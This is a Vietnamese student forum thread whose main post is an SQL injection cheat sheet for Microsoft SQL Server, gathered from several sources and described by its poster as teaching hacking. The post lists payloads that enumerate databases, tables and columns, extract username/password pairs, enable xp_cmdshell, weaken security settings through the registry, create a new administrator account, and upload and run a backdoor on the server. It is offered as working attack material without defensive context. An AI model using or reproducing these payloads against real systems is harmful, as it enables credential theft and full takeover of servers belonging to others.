Diễn Đàn Học Sinh Trường Trung Cấp Xây Dựng Tp.HCM
Chào mừngKhách viếng thămđến với diễn đàn học sinh trường TCXD. TPHCM. Các bạn hãy đăng ký thành viên để tiện cho việc xem bài viết nhé. Cám ơn các bạn!!!
Diễn Đàn Học Sinh Trường Trung Cấp Xây Dựng Tp.HCM
Chào mừngKhách viếng thămđến với diễn đàn học sinh trường TCXD. TPHCM. Các bạn hãy đăng ký thành viên để tiện cho việc xem bài viết nhé. Cám ơn các bạn!!!
Diễn Đàn Học Sinh Trường Trung Cấp Xây Dựng Tp.HCM
Mỗi một thành viên là một viên gạch xây dựng diễn đàn
Tổng số bài gửi : 200 Thanked : 79 Join date : 23/11/2011 Age : 33 Đến từ : Khu dân cư Gamer Châm ngôn sống : Trụ Cột Của Giúp Đỡ Comments : YH: honma_battri2000
Tài Sản Huy Chương:
Tiêu đề: SQL - Injection cơ bản và nâng cao
Tiêu đề:
1. Khai thác thông tin về MS SQL server
' Thông tin về version của MS SQL and 1=@@version--sp_password 'Thông tin về servername and 1=@@servername--sp_password 'Thông tin về SERVICENAME and 1=@@SERVICENAME--sp_password 'Thông tin về UID and 1=system_user--sp_password 'Thông tin về PWD ?
2. Khai thác thông tin về Database
'Thông tin về tên database and 1=db_name()--sp_password
3. Khai thác thông tin về Table 'Khai thác thông tin về Table having 1=1--sp_password 'Khai thác thông tin về các Table group by QUESTIONS.QUEST_ID having 1=1--sp_password
'Khai thác thông tin về Table UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--sp_password 'Khai thác thông tin về các Table UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('PRODUCTS')--sp_password
'Khai thác thông tin về Table and 38=convert(int,(select top 1 table_name from information_schema.tables))--sp_password 'Khai thác thông tin về các Table and 38=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('PRODUCTS')))--sp_password
4. Khai thác thông tin về Column
'Khai thác thông tin về Column and 38=convert(int,(select top 1 column_name from information_schema.columns where table_name=('QUESTIONS')))--sp_password 'Khai thác thông tin về các Column and 38=convert(int,(select top 1 column_name from information_schema.columns where table_name=('QUESTIONS') and column_name not in ('QUEST_ID')))--sp_password
5. Khai thác thông tin về Content
'Khai thác thông tin với kiểu ngày giờ and 1=convert(char(20),(select top 1 NgayXuat from PhieuXuat))--sp_password 'Khai thác thông tin dòng tiếp theo với kiểu ngày giờ and 1=convert(char(20),(select top 1 NgayXuat from PhieuXuat where NgayXuat<>'Mar 12 2003 12:00AM '))--sp_password 'Khai thác thông tin về dòng đầu tiên and 1=convert(int,(select top 1 userName+'/'+userPass from Users))--sp_password 'Khai thác thông tin dòng tiếp theo and 1=convert(int,(select top 1 userName+'/'+userPass from Users where userName not in('admin')))--sp_password
6. Khai thác thông tin về Table, Column, Content của các database tiep
Chú ý: để nhận biết kiểu của cột dữ liệu ta dùng "image" để kiểm tra: -Nếu là trường kiểu ngày/giờ Dùng: char,nchar,nvarchar,varchar
B. Upload backdoor lên host
1. Xác định mức quyền và cho phép thực thilệnh của MS SQL server
'Xác định mức quyền ;select * from openrowset('sqloledb','';;,'')-- 'Thay đổi mức quyền ;exec master..xp_regwrite HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer \Providers\SQLOLEDB','AllowInProcess',REG_DWORD,1-- ;exec master..xp_regwrite HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer \Providers\SQLOLEDB','DisallowAdhocAccess',REG_DWO RD,0-- 'Xoá bỏ và khôi phục Log và firewall trong MS SQL ;exec master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Ser vices\Tcpip\Parameters','EnableSecurityFilters'-- ;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Ser vices\Tcpip\Parameters','EnableSecurityFilters',RE G_DWORD,0-- 'Cho phép sử dụng MASTER..XP_CMDSHELL & ALLOW UPDATES ;select * from openrowset('sqloledb', 'server=Digital;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')--
2. Do thám đưa thêm các thông tin
'Do tham IP của server và đưa vào bảng testip ;drop table testip create table testip(stt int identity,dcip varchar(1000)) insert into testip exec master..xp_cmdshell 'ipconfig'-- 'Cộng thêm một quyền quản trị mới ;select * from openrowset('sqloledb', 'server=digital;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a /add"')-- (%26 == "&")
3. Đưa backdoor lên server'Upload backdoor lên server vào thư mục C:\WINDOWS\system32 ;select * from openrowset('sqloledb', 'server=digital;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..xp_cmdshell "chube >>runfile.txt"')-- ;select * from openrowset('sqloledb', 'server=digital;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..xp_cmdshell "chube >>runfile.txt & hamhoc >>runfile.txt"')-- 'Kiểm tra xem backdoor đã upload thành công chưa ;drop table testip create table testip(stt int identity,dcip varchar(1000)) insert into testip exec master..xp_cmdshell 'dir runfile.txt'--
C. Chạy backdoor trên server 1. Xác nhận backdoor đã được kích hoạt
2. Chiếm toàn bộ quyền điều khiển server
leech từ nhiều nguồn khác nhau
Mon Jan 02, 2012 6:33 pm
Tình yêu luôn bên ta, nhưng vẫn cô đơn!
4R HS Trường TCXD.TPHCM - solle bilo-
Tổng số bài gửi : 86 Thanked : 31 Join date : 24/11/2011 Age : 32 Đến từ : CAI LẬY - TIỀN GIANG - VIỆT NAM Châm ngôn sống : Tình yêu luôn bên ta, nhưng vẫn cô đơn!
Tài Sản Huy Chương:
Tiêu đề: Re: SQL - Injection cơ bản và nâng cao
Tiêu đề:
Cái j vậy................
Mon Jan 02, 2012 6:36 pm
Trụ Cột Của Giúp Đỡ
4R HS Trường TCXD.TPHCM - Admin-
Tổng số bài gửi : 200 Thanked : 79 Join date : 23/11/2011 Age : 33 Đến từ : Khu dân cư Gamer Châm ngôn sống : Trụ Cột Của Giúp Đỡ Comments : YH: honma_battri2000
Tài Sản Huy Chương:
Tiêu đề: Re: SQL - Injection cơ bản và nâng cao
Tiêu đề:
dạy làm hacker ấy mà
4R HS Trường TCXD.TPHCM - Sponsored content-
Tiêu đề: Re: SQL - Injection cơ bản và nâng cao
Tiêu đề:
SQL - Injection cơ bản và nâng cao
Trang 1 trong tổng số 1 trang
* Không dùng những ngôn từ thiếu lịch sự. * Bài viết sưu tầm nên ghi rõ nguồn. * Tránh spam nhảm không liên quan đến chủ đề. Yêu cầu viết tiếng Việt có dấu.
Mon Jan 02, 2012 5:35 pm
Tiêu đề: SQL - Injection cơ bản và nâng cao
